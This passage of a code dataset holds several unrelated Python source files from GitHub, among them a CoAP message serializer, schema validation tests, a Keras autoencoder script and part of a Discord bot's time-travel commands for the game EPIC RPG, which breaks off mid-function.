    errSorted = err[:, ids_sorted]\r\n        varSorted = [varCols[i] for i in ids_sorted]\r\n\r\n        plt.figure()\r\n        y_pos = np.arange(N)    # the y locations for the bars\r\n        plt.barh(y_pos, mSorted, align='center', alpha=0.4, xerr=errSorted)\r\n        plt.yticks(y_pos, varSorted)\r\n        plt.xlabel('Average score')\r\n        plt.title('Mean and one-sided standard deviations of scores')\r\n        plt.show()\r\n\r\n        # fig, ax = plt.subplots()\r\n        # ind = np.arange(N)    # the x locations for the groups\r\n        # width = 0.70         # the width of the bars\r\n        # ax.barh(ind, menMeans, width, color='b', xerr=menStd)\r\n        # ax.set_title('Average scores for each variable')\r\n        # # ax.set_xticks(ind + width / 2)\r\n        # ax.set_yticklabels(varCols)\r\n        # # ax.tick_params(axis='x')\r\n        # ax.autoscale_view()\r\n\r\n        return\r\n\r\n","repo_name":"ML4DS/ExamManagerPub","sub_path":"examManager/code/lib/examProject.py","file_name":"examProject.py","file_ext":"py","file_size_in_byte":22003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37399923418","text":"from .schemas import (\n    BookSchemaDefault,\n    BookSchemaTypeRequired,\n    BookSchemaEveryoneRequired,\n    BookSchemaCustomValidator,\n    BookSchemaRelationship,\n    BookSchemaWithTwoRelationship,\n    Father,\n    Child,\n    Many)\n\n\nclass TestApificator:\n    def test_default(self):\n        _payload = {}\n        assert BookSchemaDefault().load(_payload)\n\n    def test_type_required(self):\n        _payload = {}\n        book = BookSchemaTypeRequired().load(_payload)\n        assert book.errors['data']['type'] == ['Missing data for required field.']\n        _payload = {\n            \"data\": {\n                \"attributes\": {},\n                \"type\": \"book\"\n            }\n        }\n        book = BookSchemaTypeRequired().load(_payload)\n        assert book.errors == {}\n\n    def test_everyone_required(self):\n        _payload = {\n            \"data\": {}\n        }\n        book = 
BookSchemaEveryoneRequired().load(_payload)\n assert book.errors['data']['type'] == ['Missing data for required field.']\n assert book.errors['data']['id'] == ['Missing data for required field.']\n assert book.errors['data']['attributes'] == ['Missing data for required field.']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {},\n \"id\": \"\"\n }}\n book = BookSchemaEveryoneRequired().load(_payload)\n assert book.errors == {}\n\n def test_custom_validator(self):\n _payload = {}\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors['data']['type'] == ['Missing data for required field.']\n _payload = {\n \"data\": {\n \"type\": \"books\"\n }\n }\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors['data']['type'] == ['type must be book']\n _payload = {\n \"data\": {\n \"type\": \"book\"\n }\n }\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors == {}\n\n def test_one_relationship(self):\n _payload = {\n \"data\": {\n \"relationships\": {}\n }\n }\n book = BookSchemaRelationship().load(_payload)\n assert book.errors['data']['relationships']\n assert book.errors['data']['type']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {\n \"title\": \"It\"\n },\n \"relationships\": {\n \"author_schema\": {\n \"name\": \"Jose\"\n }\n }\n }\n }\n book = BookSchemaRelationship().load(_payload)\n assert not book.errors\n\n def test_two_relationships(self):\n _payload = {\n \"data\": {\n \"relationships\": {}\n }\n }\n book = BookSchemaWithTwoRelationship().load(_payload)\n assert len(book.errors['data']['relationships']) == 1\n assert book.errors['data']['type']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {\n \"title\": \"It\"\n },\n \"relationships\": {\n \"author_schema\": {\n \"name\": \"Jose\"\n },\n \"publish_schema\": {\n \"name\": \"Martin\"\n }\n }\n }\n }\n book = BookSchemaWithTwoRelationship().load(_payload)\n assert not book.errors\n\n def test_inheritance(self):\n assert Father().validate({\"data\": {\"attributes\": {}}}) == {\n 'data': {'attributes': {'age': [u'Missing data for required field.'],\n 'name': [u'Missing data for required field.']}}}\n assert Child().validate({\"data\": {\"attributes\": {}}}) == {}\n\n def test_many_true(self):\n assert Many().validate({\"data\": []}) == {}\n assert Many().validate({\"data\": [{\"name\": 12345.12}]}) == {\n 'data': {0: {'name': ['Not a valid string.'], 'age': ['Missing data for required field.']}}}\n","repo_name":"geru-br/geru-marshmallow-jsonapi","sub_path":"tests/test_apificator.py","file_name":"test_apificator.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41618819887","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\ndataset = pd.read_csv('training.csv')\n\ntrain_data = dataset.sample(frac=0.8, random_state=0)\ntest_data = dataset.drop(train_data.index)\n\nx_train = train_data.drop(['ONCOGENIC'], axis=1).to_numpy()\ny_train = train_data['ONCOGENIC'].to_numpy()\nx_test = test_data.drop(['ONCOGENIC'], axis=1).to_numpy()\ny_test = test_data['ONCOGENIC'].to_numpy()\n\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\ninput_shape = (26,)\nencoding_dim1 = 122\nencoding_dim2 = 13\nencoding_dim3 = 2\n\ninput_layer = keras.Input(shape=input_shape)\nencoder1 = layers.Dense(encoding_dim1, 
activation='relu')(input_layer)\nencoder2 = layers.Dense(encoding_dim2, activation='relu')(encoder1)\nencoder3 = layers.Dense(encoding_dim3, activation='relu')(encoder2)\n\ndecoder1 = layers.Dense(encoding_dim2, activation='relu')(encoder3)\ndecoder2 = layers.Dense(encoding_dim1, activation='relu')(decoder1)\noutput_layer = layers.Dense(26, activation='sigmoid')(decoder2)\n\nmodel = keras.Model(inputs=input_layer, outputs=output_layer)\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.fit(x_train, x_train, batch_size=32, epochs=10, validation_split=0.1)\n\nencoder = keras.Model(inputs=input_layer, outputs=encoder3)\nencoded_x_train = encoder.predict(x_train)\nencoded_x_test = encoder.predict(x_test)\n\nclassifier = keras.Sequential(\n    [\n        layers.Dense(128, activation='relu', input_shape=(encoding_dim3,)),\n        layers.Dense(6, activation='softmax')\n    ]\n)\n\nclassifier.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ny_train = keras.utils.to_categorical(y_train)\ny_test = keras.utils.to_categorical(y_test)\nclassifier.fit(encoded_x_train, y_train, batch_size=32, epochs=10, validation_split=0.1)\n\ntrain_loss, train_accuracy = classifier.evaluate(encoded_x_train, y_train)\nprint(f\"Training Accuracy: {train_accuracy}\")\n\ntest_loss, test_accuracy = classifier.evaluate(encoded_x_test, y_test)\nprint(f\"Testing Accuracy: {test_accuracy}\")","repo_name":"ZeeFcd/projektmunka3","sub_path":"DeepLearningAlgorithms/Stacked Auto-Encoders.py","file_name":"Stacked Auto-Encoders.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15334601144","text":"import pandas as pd\r\nimport random\r\n\r\nnames = [\"Roger\", \"Stuart\", \"Buddy\", \"Johnson\", \"Tommy\"]\r\ncolors = [\"Red\", \"Green\", \"Yellow\", \"Gray\", \"Blue\"]\r\nspecies_names = [\"Wooly Mammoth\", \"Birds\", \"Reptiles\", \"Fish\", \"Rodents\"]\r\n\r\nclass ExoticAnimals:\r\n    def __init__(self, name, height=1, weight=1, color='brown',\r\n                 legs=4, species=None, mammal=True):\r\n        self.name = str(name)\r\n        self.height = int(height)\r\n        self.weight = int(weight)\r\n        self.color = color\r\n        self.legs = legs\r\n        self.species = species\r\n        self.mammal = mammal\r\n\r\n    def move(self, distance, direction):\r\n        return f\"{self.name} travels {distance} meters in {direction} direction!\"\r\n\r\n    def eat(self, food):\r\n        return f\"Yum, yum! I love {food}!\"\r\n\r\nclass Anaconda(ExoticAnimals):\r\n    def __init__(self, name, height, weight, color, constrictor, legs=0, species=\"snake\", mammal=False):\r\n        super().__init__(name, height, weight, color, legs, species, mammal)\r\n        self.constrictor = bool(constrictor)\r\n\r\n    def move(self, distance, direction):\r\n        return f\"{self.name} slithers {distance} meters in {direction} direction!\"\r\n\r\n\r\ndef create_animal():\r\n    print(\"Welcome to the program! Please provide the following info:\")\r\n    n = input(\"What is your animal's name? \")\r\n    h = input(\"What is your animal's height? \")\r\n    w = input(\"What is your animal's weight? \")\r\n    c = input(\"What is your animal's color? \")\r\n    l = input(\"What is your animal's number of legs? \")\r\n    s = input(\"What is your animal's species? \")\r\n    # Compare against the literal answer so a real boolean is stored\r\n    # (bool(\"False\") would otherwise be truthy).\r\n    m = input(\"Is your animal a mammal? True or False \") == \"True\"\r\n    dist = input(\"How far will your animal travel? \")\r\n    dirc = input(\"Which direction will your animal go? 
\")\r\n user_animal = ExoticAnimals(name=n, height=h, weight=w, color=c, legs=l, species=s, mammal=m)\r\n print(user_animal.move(dist, dirc))\r\n\r\ndef lots_of_animals(n):\r\n animals = []\r\n while n > 0:\r\n a_name = random.choice(names)\r\n a_height = random.randint(5, 501)\r\n a_weight = random.randint(2, 2001)\r\n a_color = random.choice(colors)\r\n a_legs = random.randint(0, 5)\r\n a_species = random.choice(species_names)\r\n if a_species == \"Rodents\" or a_species == \"Wooly Mammoth\":\r\n a_mammal = True\r\n else:\r\n a_mammal = False\r\n\r\n a_animal = ExoticAnimals(a_name, a_height, a_weight, a_color, a_legs, a_species, a_mammal)\r\n animals.append(a_animal)\r\n\r\n n = n-1\r\n \r\n return animals\r\n","repo_name":"dscohen75/lambdata","sub_path":"lambdata_dscohen75/oop_example_ds19.py","file_name":"oop_example_ds19.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9700919","text":"import logging\nimport struct\nimport ctypes\nfrom coapthon.messages.request import Request\nfrom coapthon.messages.response import Response\nfrom coapthon.messages.option import Option\nfrom coapthon import defines\nfrom coapthon.messages.message import Message\n\n__author__ = 'Giacomo Tanganelli'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Serializer(object):\n \"\"\"\n Serializer class to serialize and deserialize CoAP message to/from udp streams.\n \"\"\"\n @staticmethod\n def deserialize(datagram, source):\n \"\"\"\n De-serialize a stream of byte to a message.\n\n :param datagram: the incoming udp message\n :param source: the source address and port (ip, port)\n :return: the message\n :rtype: Message\n \"\"\"\n try:\n fmt = \"!BBH\"\n pos = struct.calcsize(fmt)\n s = struct.Struct(fmt)\n values = s.unpack_from(datagram)\n first = values[0]\n code = values[1]\n mid = values[2]\n version = (first & 0xC0) >> 6\n message_type = (first & 0x30) >> 4\n token_length = (first & 0x0F)\n if Serializer.is_response(code):\n message = Response()\n message.code = code\n elif Serializer.is_request(code):\n message = Request()\n message.code = code\n else:\n message = Message()\n message.source = source\n message.destination = None\n message.version = version\n message.type = message_type\n message.mid = mid\n if token_length > 0:\n fmt = \"%ss\" % token_length\n s = struct.Struct(fmt)\n token_value = s.unpack_from(datagram[pos:])[0]\n message.token = token_value\n else:\n message.token = None\n\n pos += token_length\n current_option = 0\n values = datagram[pos:]\n length_packet = len(values)\n pos = 0\n while pos < length_packet:\n next_byte = struct.unpack(\"B\", values[pos])[0]\n pos += 1\n if next_byte != int(defines.PAYLOAD_MARKER):\n # the first 4 bits of the byte represent the option delta\n # delta = self._reader.read(4).uint\n num, option_length, pos = Serializer.read_option_value_len_from_byte(next_byte, pos, values)\n current_option += num\n # read option\n try:\n option_item = defines.OptionRegistry.LIST[current_option]\n except KeyError:\n (opt_critical, _, _) = defines.OptionRegistry.get_option_flags(current_option)\n if opt_critical:\n raise AttributeError(\"Critical option %s unknown\" % current_option)\n else:\n # If the non-critical option is unknown\n # (vendor-specific, proprietary) - just skip it\n #log.err(\"unrecognized option %d\" % current_option)\n pass\n else:\n if option_length == 0:\n value = None\n elif option_item.value_type == defines.INTEGER:\n tmp = values[pos: pos + 
                            tmp = values[pos: pos + option_length]\n                            value = 0\n                            for b in tmp:\n                                value = (value << 8) | struct.unpack(\"B\", b)[0]\n                        elif option_item.value_type == defines.OPAQUE:\n                            tmp = values[pos: pos + option_length]\n                            value = bytearray(tmp)\n                        else:\n                            tmp = values[pos: pos + option_length]\n                            value = \"\"\n                            for b in tmp:\n                                value += str(b)\n\n                        option = Option()\n                        option.number = current_option\n                        option.value = Serializer.convert_to_raw(current_option, value, option_length)\n\n                        message.add_option(option)\n                        if option.number == defines.OptionRegistry.CONTENT_TYPE.number:\n                            message.payload_type = option.value\n                    finally:\n                        pos += option_length\n                else:\n\n                    if length_packet <= pos:\n                        # log.err(\"Payload Marker with no payload\")\n                        raise AttributeError(\"Packet length %s, pos %s\" % (length_packet, pos))\n                    message.payload = \"\"\n                    payload = values[pos:]\n                    for b in payload:\n                        message.payload += str(b)\n                        pos += 1\n            return message\n        except AttributeError:\n            return defines.Codes.BAD_REQUEST.number\n        except struct.error:\n            return defines.Codes.BAD_REQUEST.number\n\n    @staticmethod\n    def serialize(message):\n        \"\"\"\n        Serialize a message to a UDP packet\n\n        :type message: Message\n        :param message: the message to be serialized\n        :rtype: stream of bytes\n        :return: the message serialized\n        \"\"\"\n        fmt = \"!BBH\"\n\n        if message.token is None or message.token == \"\":\n            tkl = 0\n        else:\n            tkl = len(message.token)\n        tmp = (defines.VERSION << 2)\n        tmp |= message.type\n        tmp <<= 4\n        tmp |= tkl\n        values = [tmp, message.code, message.mid]\n\n        if message.token is not None and tkl > 0:\n\n            for b in str(message.token):\n                fmt += \"c\"\n                values.append(b)\n\n        options = Serializer.as_sorted_list(message.options)   # already sorted\n        lastoptionnumber = 0\n        for option in options:\n\n            # write 4-bit option delta\n            optiondelta = option.number - lastoptionnumber\n            optiondeltanibble = Serializer.get_option_nibble(optiondelta)\n            tmp = (optiondeltanibble << defines.OPTION_DELTA_BITS)\n\n            # write 4-bit option length\n            optionlength = option.length\n            optionlengthnibble = Serializer.get_option_nibble(optionlength)\n            tmp |= optionlengthnibble\n            fmt += \"B\"\n            values.append(tmp)\n\n            # write extended option delta field (0 - 2 bytes)\n            if optiondeltanibble == 13:\n                fmt += \"B\"\n                values.append(optiondelta - 13)\n            elif optiondeltanibble == 14:\n                fmt += \"H\"\n                values.append(optiondelta - 269)\n\n            # write extended option length field (0 - 2 bytes)\n            if optionlengthnibble == 13:\n                fmt += \"B\"\n                values.append(optionlength - 13)\n            elif optionlengthnibble == 14:\n                fmt += \"H\"\n                values.append(optionlength - 269)\n\n            # write option value\n            if optionlength > 0:\n                opt_type = defines.OptionRegistry.LIST[option.number].value_type\n                if opt_type == defines.INTEGER:\n                    words = Serializer.int_to_words(option.value, optionlength, 8)\n                    for num in range(0, optionlength):\n                        fmt += \"B\"\n                        values.append(words[num])\n                elif opt_type == defines.STRING:\n                    for b in str(option.value):\n                        fmt += \"c\"\n                        values.append(b)\n                else:\n                    for b in option.value:\n                        fmt += \"B\"\n                        values.append(b)\n\n            # update last option number\n            lastoptionnumber = option.number\n\n        payload = message.payload\n\n        if payload is not None and len(payload) > 0:\n            # if payload is present and of non-zero length, it is prefixed by\n            # a one-byte Payload Marker (0xFF) which indicates the end of\n            # options and the start of the payload\n\n            fmt += \"B\"\n            values.append(defines.PAYLOAD_MARKER)\n\n            for b in str(payload):\n                fmt += \"c\"\n                values.append(b)\n\n        datagram = None\n        if values[1] is None:\n            values[1] = 0\n
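        # struct.pack_into below raises struct.error if a value does not fit\n        # the format string assembled above; in that case the error is logged\n        # and None is returned instead of a datagram.\n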
        try:\n            s = struct.Struct(fmt)\n            datagram = ctypes.create_string_buffer(s.size)\n            s.pack_into(datagram, 0, *values)\n        except struct.error:\n            # The .exception method will report on the exception encountered\n            # and provide a traceback.\n            logging.exception('Failed to pack structure')\n\n        return datagram\n\n    @staticmethod\n    def is_request(code):\n        \"\"\"\n        Checks if the code is a request code.\n\n        :return: True, if the code is a request code\n        \"\"\"\n        return defines.REQUEST_CODE_LOWER_BOUND <= code <= defines.REQUEST_CODE_UPPER_BOUND\n\n    @staticmethod\n    def is_response(code):\n        \"\"\"\n        Checks if the code is a response code.\n\n        :return: True, if the code is a response code\n        \"\"\"\n        return defines.RESPONSE_CODE_LOWER_BOUND <= code <= defines.RESPONSE_CODE_UPPER_BOUND\n\n    @staticmethod\n    def read_option_value_from_nibble(nibble, pos, values):\n        \"\"\"\n        Calculates the value used in the extended option fields.\n\n        :param nibble: the 4-bit option header value.\n        :return: the value calculated from the nibble and the extended option value.\n        \"\"\"\n        if nibble <= 12:\n            return nibble, pos\n        elif nibble == 13:\n            tmp = struct.unpack(\"!B\", values[pos])[0] + 13\n            pos += 1\n            return tmp, pos\n        elif nibble == 14:\n            s = struct.Struct(\"!H\")\n            tmp = s.unpack_from(values[pos:])[0] + 269\n            pos += 2\n            return tmp, pos\n        else:\n            raise AttributeError(\"Unsupported option nibble \" + str(nibble))\n\n    @staticmethod\n    def read_option_value_len_from_byte(byte, pos, values):\n        \"\"\"\n        Calculates the value and length used in the extended option fields.\n\n        :param byte: 1-byte option header value.\n        :return: the value and length, calculated from the header including the extended fields.\n        \"\"\"\n        h_nibble = (byte & 0xF0) >> 4\n        l_nibble = byte & 0x0F\n        value = 0\n        length = 0\n        if h_nibble <= 12:\n            value = h_nibble\n        elif h_nibble == 13:\n            value = struct.unpack(\"!B\", values[pos])[0] + 13\n            pos += 1\n        elif h_nibble == 14:\n            s = struct.Struct(\"!H\")\n            value = s.unpack_from(values[pos:])[0] + 269\n            pos += 2\n        else:\n            raise AttributeError(\"Unsupported option number nibble \" + str(h_nibble))\n\n        if l_nibble <= 12:\n            length = l_nibble\n        elif l_nibble == 13:\n            length = struct.unpack(\"!B\", values[pos])[0] + 13\n            pos += 1\n        elif l_nibble == 14:\n            # build the 2-byte struct locally, so it also exists when the\n            # delta nibble did not already create it\n            s = struct.Struct(\"!H\")\n            length = s.unpack_from(values[pos:])[0] + 269\n            pos += 2\n        else:\n            raise AttributeError(\"Unsupported option length nibble \" + str(l_nibble))\n        return value, length, pos\n
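    # Worked example: the header byte 0xD1 has delta nibble 13 and length\n    # nibble 1, so the real option delta is the next byte plus 13. For the\n    # byte sequence 0xD1 0x01 this yields value = 1 + 13 = 14 and length = 1.\n\n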
    @staticmethod\n    def convert_to_raw(number, value, length):\n        \"\"\"\n        Get the value of an option as a bytearray.\n\n        :param number: the option number\n        :param value: the option value\n        :param length: the option length\n        :return: the value of an option as a bytearray (or an int, for\n            integer-typed options)\n        \"\"\"\n\n        opt_type = defines.OptionRegistry.LIST[number].value_type\n\n        if length == 0 and opt_type != defines.INTEGER:\n            return bytearray()\n        if length == 0 and opt_type == defines.INTEGER:\n            return 0\n        if isinstance(value, tuple):\n            value = value[0]\n        if isinstance(value, unicode):\n            value = str(value)\n        if isinstance(value, str):\n            return bytearray(value, \"utf-8\")\n        elif isinstance(value, int):\n            return value\n        else:\n            return bytearray(value)\n\n    @staticmethod\n    def as_sorted_list(options):\n        \"\"\"\n        Returns all options in a list sorted according to their option numbers.\n\n        :return: the sorted list\n        \"\"\"\n        if len(options) > 0:\n            options.sort(None, key=lambda o: o.number)\n        return options\n\n    @staticmethod\n    def get_option_nibble(optionvalue):\n        \"\"\"\n        Returns the 4-bit option header value.\n\n        :param optionvalue: the option value (delta or length) to be encoded.\n        :return: the 4-bit option header value.\n        \"\"\"\n        if optionvalue <= 12:\n            return optionvalue\n        elif optionvalue <= 255 + 13:\n            return 13\n        elif optionvalue <= 65535 + 269:\n            return 14\n        else:\n            raise AttributeError(\"Unsupported option delta \" + str(optionvalue))\n\n    @staticmethod\n    def int_to_words(int_val, num_words=4, word_size=32):\n        \"\"\"\n        Convert an int value to a list of fixed-width words.\n\n        :param int_val: an arbitrary length Python integer to be split up.\n            Network byte order is assumed. Raises an AttributeError if width of\n            integer (in bits) exceeds word_size * num_words.\n\n        :param num_words: number of words expected in return value tuple.\n\n        :param word_size: size/width of individual words (in bits).\n\n        :return: a list of fixed width words based on provided parameters.\n        \"\"\"\n        max_int = 2 ** (word_size*num_words) - 1\n        max_word_size = 2 ** word_size - 1\n\n        if not 0 <= int_val <= max_int:\n            raise AttributeError('integer %r is out of bounds!' % hex(int_val))\n\n        words = []\n        for _ in range(num_words):\n            word = int_val & max_word_size\n            words.append(int(word))\n            int_val >>= word_size\n        words.reverse()\n\n        return words\n
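    # Example: int_to_words(0x0102, num_words=2, word_size=8) returns [1, 2],\n    # i.e. the big-endian bytes of the integer.\n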
","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"} +{"seq_id":"34721665176","text":"import csv\nfrom os import remove # needed to remove old CSV files\nfrom time import clock\n\nfrom constants import *\nfrom setupRun import DIRECTORY\nfrom simulationController import SimulationController\n\n# basic variable set-up\ndirectoryOut = \"%s/benchmarkCA\" % DIRECTORY # set directory for output files\n\nfile = \"%s/sizeTest.csv\" % (directoryOut)\n\n# remove existing output CSV data, if possible\ntry:\n    remove(file)\nexcept:\n    pass\n\ntransformerName = TESTTRANSFORMER\n\ninputName = SIMPLEINPUT\ninputArgs1 = {CAINITNAMEARGS:\"initialCA1\",\n              DIRECTORYARGS:None,\n              THETAARGS:22.0,\n              MARGS:0.21,\n              RARGS:3.25,\n              QARGS:1.0}\n\nruleArgs = {DISPERSIONARGS:True}\n\n# measure the time for one CA step depending on the CA size, using easyCA\nprint(\"start measuring timeEasyCA for one step depending on CA size\")\nwith open(file, 'a', newline = '') as csvfile:\n    data = csv.writer(csvfile, delimiter = \",\")\n    n = 1000000\n    for l in range(1, 14):\n        # set initial CA\n        initCA = [[[1 for h in range(2)] for i in range(l)] for j in range(n)]\n        # benchmarking with easyCA\n        controller1 = SimulationController(n, l, False) # disable saving\n        controller1.initBenchmark(transformerName,\n                                  inputName,\n                                  COMBICA,\n                                  TESTRULE,\n                                  inputArgs1,\n                                  initCA,\n                                  EASYCA,\n                                  None,\n                                  ruleArgs)\n        timeEasyCA = clock()\n        controller1.doSimulation(1, 1)\n        timeEasyCA = clock() - timeEasyCA\n        data.writerow([n * l, timeEasyCA])\n        print(\"%i: number of cells: %i; timeEasyCA: %f\" % (l, n * l, timeEasyCA))\nprint(\"measuring timeEasyCA done\")","repo_name":"flossCoder/mosquito-simulation","sub_path":"run/benchmarkCASizeEasyCA.py","file_name":"benchmarkCASizeEasyCA.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19989035607","text":"# timetravel.py\n\nimport asyncio\nfrom decimal import Decimal, ROUND_HALF_UP\nfrom math import floor, ceil\nfrom typing import Optional\n\nimport discord\n\nimport database\nfrom resources import emojis, functions, settings, strings, views\n\n\n# --- Topics ---\nTOPIC_TT = 'Time travel (TT)'\nTOPIC_TJ = 'Time jump / Super time travel (STT)'\n\nTOPICS = [\n    TOPIC_TT,\n    TOPIC_TJ,\n]\n\nTOPIC_SCORE_GEAR = 'Gear'\nTOPIC_SCORE_MATERIALS = 'Materials'\nTOPIC_SCORE_STATS = 'Stats & enchants'\n\nTOPICS_SCORE = [\n    TOPIC_SCORE_GEAR,\n    TOPIC_SCORE_MATERIALS,\n    TOPIC_SCORE_STATS,\n]\n\n\n# --- Calculator options ---\nINVENTORY_CURRENT = 'Calculate as is'\nINVENTORY_TRADE_A15 = 'Trade to A15 rubies'\nINVENTORY_TRADE_A16 = 'Trade to A16+ rubies'\n\nTJ_CALCULATOR_INVENTORY = [\n    INVENTORY_CURRENT,\n    INVENTORY_TRADE_A15,\n    INVENTORY_TRADE_A16,\n]\n\nSTATS_NONE = 'No stats'\nSTATS_CURRENT = 'Current stats'\nSTATS_MANUAL = 'Manual input'\n\nTJ_CALCULATOR_STATS = [\n    STATS_NONE,\n    STATS_CURRENT,\n    STATS_MANUAL,\n]\n\nBOOSTS_NONE = 'No boosts'\nBOOSTS_CURRENT = 'Current boosts'\n\nTJ_CALCULATOR_BOOSTS = [\n    BOOSTS_NONE,\n    BOOSTS_CURRENT,\n]\n\n# --- Commands ---\nasync def command_time_travel_guide(ctx: discord.ApplicationContext, topic: str) -> None:\n    \"\"\"Timetravel guide command\"\"\"\n    topics_functions = {\n        TOPIC_TT: embed_time_travel,\n        TOPIC_TJ: embed_time_jump,\n    }\n    view = views.TopicView(ctx, topics_functions, active_topic=topic)\n    embed = await topics_functions[topic]()\n    interaction = await ctx.respond(embed=embed, view=view)\n    view.interaction = interaction\n    await view.wait()\n    try:\n        await functions.edit_interaction(interaction, view=None)\n    except discord.errors.NotFound:\n        pass\n\n\nasync def command_time_travel_bonuses(ctx: discord.ApplicationContext, timetravel: Optional[int] = None) -> None:\n    \"\"\"Timetravel bonuses command\"\"\"\n    mytt = True if timetravel is None else False\n    if timetravel is None:\n        user: database.User = await database.get_user(ctx.author.id)\n        timetravel = user.tt\n    if timetravel == 10_000:\n        await ctx.respond('https://c.tenor.com/OTU2-ychJwsAAAAC/lightning-squidward.gif')\n        return\n    tt: database.TimeTravel = await database.get_time_travel(timetravel)\n    embed = await embed_time_travel_bonuses(tt, mytt)\n    await ctx.respond(embed=embed)\n\n\nasync def command_time_jump_score(ctx: discord.ApplicationContext, topic: str) -> None:\n    \"\"\"Time jump score command\"\"\"\n    topics_functions = {\n        TOPIC_SCORE_GEAR: embed_time_jump_score_gear,\n        TOPIC_SCORE_MATERIALS: embed_time_jump_score_materials,\n        TOPIC_SCORE_STATS: embed_time_jump_score_stats,\n    }\n    view = views.TopicView(ctx, topics_functions, active_topic=topic)\n    embed = await topics_functions[topic]()\n    interaction = await ctx.respond(embed=embed, view=view)\n    view.interaction = interaction\n    await view.wait()\n    try:\n        await functions.edit_interaction(interaction, view=None)\n    except discord.errors.NotFound:\n        pass\n\n\nasync def command_time_jump_calculator(bot: discord.Bot, ctx: discord.ApplicationContext, area_no: int,\n                                       option_inventory: str, option_stats: str, option_boosts: str) -> None:\n    \"\"\"STT score calculator command\"\"\"\n    bot_message_task = asyncio.ensure_future(functions.wait_for_inventory_message(bot, ctx))\n    try:\n        content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n                                                          command=strings.SLASH_COMMANDS_EPIC_RPG[\"inventory\"])\n        bot_message = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n    except asyncio.TimeoutError:\n        await ctx.respond(\n            strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='inventory'),\n            ephemeral=True\n        )\n        return\n    if bot_message is None: return\n    inventory = ''\n    for field in bot_message.embeds[0].fields:\n        inventory = f'{inventory}{field.value}\\n'\n\n    profile_data = {}\n    boosts_data = {\n        'at': 0,\n        'def': 0,\n        'life': 0,\n    }\n    if option_stats == 
STATS_CURRENT:\n        bot_message_task = asyncio.ensure_future(functions.wait_for_profile_message(bot, ctx))\n        try:\n            content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n                                                              command=strings.SLASH_COMMANDS_EPIC_RPG[\"profile\"])\n            bot_message_profile = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n        except asyncio.TimeoutError:\n            await ctx.respond(\n                strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='profile'),\n                ephemeral=True\n            )\n            return\n        if bot_message_profile is None: return\n        profile_data = await functions.extract_data_from_profile_embed(ctx, bot_message_profile)\n    if option_boosts == BOOSTS_CURRENT:\n        bot_message_task = asyncio.ensure_future(functions.wait_for_boosts_message(bot, ctx))\n        try:\n            content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n                                                              command=strings.SLASH_COMMANDS_EPIC_RPG[\"boosts\"])\n            bot_message_boosts = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n        except asyncio.TimeoutError:\n            await ctx.respond(\n                strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='boosts'),\n                ephemeral=True\n            )\n            return\n        if bot_message_boosts is None: return\n        boosts_data = await functions.extract_data_from_boosts_embed(ctx, bot_message_boosts)\n    profile_data['horse_boost'] = 0\n    profile_data['horse_epicness'] = 0\n    profile_data['horse_level'] = 0\n    profile_data['horse_tier'] = 0\n    if profile_data.get('horse_type') in ('magic', 'defender', 'strong', 'tank'):\n        bot_message_task = asyncio.ensure_future(functions.wait_for_horse_message(bot, ctx))\n        try:\n            content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n                                                              command=strings.SLASH_COMMANDS_EPIC_RPG[\"horse stats\"])\n            bot_message = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n        except asyncio.TimeoutError:\n            await ctx.respond(\n                strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='horse stats'),\n                ephemeral=True\n            )\n            return\n        if bot_message is None: return\n        horse_data = await functions.extract_horse_data_from_horse_embed(ctx, bot_message)\n        profile_data['horse_boost'] = horse_data['boost']\n        profile_data['horse_epicness'] = horse_data['epicness']\n        profile_data['horse_level'] = horse_data['level']\n        profile_data['horse_tier'] = horse_data['tier']\n\n    if option_stats == STATS_MANUAL:\n        all_items_list = list(await database.get_all_items())\n        all_items_list.sort(key=lambda item: item.score)\n        profile_data['sword'] = None\n        profile_data['armor'] = None\n        all_items = {}\n        for item in all_items_list:\n            if item.name.lower() == 'ultra-omega sword':\n                profile_data['sword'] = item\n            if item.name.lower() == 'ultra-omega armor':\n                profile_data['armor'] = item\n            all_items[item.name] = item\n        profile_data['level'] = 200\n        profile_data['extra_at'] = 0\n        profile_data['extra_def'] = 0\n        profile_data['extra_life'] = 0\n        profile_data['enchant_sword'] = 'OMEGA'\n        